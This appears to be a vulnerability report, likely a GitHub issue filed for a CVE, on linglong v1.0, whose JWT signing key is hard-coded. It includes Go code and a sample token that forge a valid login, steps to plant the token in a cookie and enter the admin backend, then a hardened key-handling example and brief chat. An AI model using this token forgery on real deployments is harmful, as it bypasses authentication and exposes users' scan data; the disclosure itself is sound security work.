linglong
An invalid access control vulnerability was found
[Suggested description]
Attackers can directly construct the corresponding JWT authentication information and enter the backend to view, add tasks and scan results.
[Vulnerability Type]
Incorrect Access Control
[Vendor of Product]
https://github.com/awake1t/linglong/
[Affected Product Code Base]
v1.0
[Affected Component]
Use the following code to generate the corresponding JWT data
```go
package main

import (
	"fmt"
	"time"

	"github.com/dgrijalva/jwt-go"
)

// HS256 signing key used to sign the token.
var jwtSecret = []byte("213123dd1")

// Claims is the token payload: username, password and the standard JWT claims.
type Claims struct {
	Username string `json:"username"`
	Password string `json:"password"`
	jwt.StandardClaims
}

func main() {
	token, err := GenerateToken("linglong", "bingan")
	if err != nil {
		fmt.Println("Linglong Token 生成失败")
		return // do not print an empty token
	}
	fmt.Println("TOKEN: " + token)
	fmt.Println("HEADER: ")
	fmt.Println("Authorization: " + token)
}

// GenerateToken signs a token for the given credentials, valid for three hours.
func GenerateToken(username, password string) (string, error) {
	//fmt.Println("GenerateToken")
	nowTime := time.Now()
	expireTime := nowTime.Add(3 * time.Hour)
	claims := Claims{
		username,
		password,
		jwt.StandardClaims{
			ExpiresAt: expireTime.Unix(),
			Issuer:    "linglong",
		},
	}
	tokenClaims := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
	token, err := tokenClaims.SignedString(jwtSecret)
	return token, err
}
```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imxpbmdsb25nIiwicGFzc3dvcmQiOiJxYXhzZWMiLCJleHAiOjE2NTAyNzYwOTAsImlzcyI6Imxpbmdsb25nIn0.jCiOvtQkXyQXsqzqWY8FdN7yiyTTj-piIo_aSKF3v6Q
Open the Linglong site and write the JWT data into the cookie
Open URL: /#/welcome
You can enter the Linglong backend
[Defective code]
/pkg/utils/jwt.go
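A hardened counterpart to the hard-coded `jwtSecret` in the report above, as an added example that is not part of the original issue or the linglong code base: the key is read from the environment or generated randomly at startup, so a token signed with the key published in the report no longer verifies. The variable name `LINGLONG_JWT_SECRET` and the function names are assumptions, and the HS256 check is written against the Go standard library rather than the project's jwt-go dependency.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"os"
	"strings"
)

const hs256Header = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" // base64url of {"alg":"HS256","typ":"JWT"}

// LoadSecret reads LINGLONG_JWT_SECRET (assumed name) or generates a per-process random key.
func LoadSecret() ([]byte, error) {
	if s := os.Getenv("LINGLONG_JWT_SECRET"); s != "" {
		if len(s) < 32 {
			return nil, fmt.Errorf("JWT secret is %d bytes, want at least 32", len(s))
		}
		return []byte(s), nil
	}
	key := make([]byte, 32)
	_, err := rand.Read(key)
	return key, err
}

// Sign returns the base64url HMAC-SHA256 tag over the "header.payload" string.
func Sign(signingInput string, key []byte) string {
	m := hmac.New(sha256.New, key)
	m.Write([]byte(signingInput))
	return base64.RawURLEncoding.EncodeToString(m.Sum(nil))
}

// Verify accepts only the pinned HS256 header and compares the tag in constant time.
func Verify(token string, key []byte) bool {
	p := strings.Split(token, ".")
	return len(p) == 3 && p[0] == hs256Header &&
		hmac.Equal([]byte(p[2]), []byte(Sign(p[0]+"."+p[1], key)))
}

func main() {
	key, err := LoadSecret()
	if err != nil {
		panic(err)
	}
	body := hs256Header + ".eyJpc3MiOiJsaW5nbG9uZyJ9" // constructed claims: {"iss":"linglong"}
	fmt.Println("signed with the loaded key:", Verify(body+"."+Sign(body, key), key))
	fmt.Println("signed with the key from the report:", Verify(body+"."+Sign(body, []byte("213123dd1")), key))
}
```

A randomly generated key invalidates all sessions on restart; set the environment variable when tokens must survive restarts or be shared across instances.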
I get the reasoning, but I'm curious why you don't write in Chinese?
Because it's being submitted for a CVE..
Hahaha, I guessed as much. Is there a CVE number yet?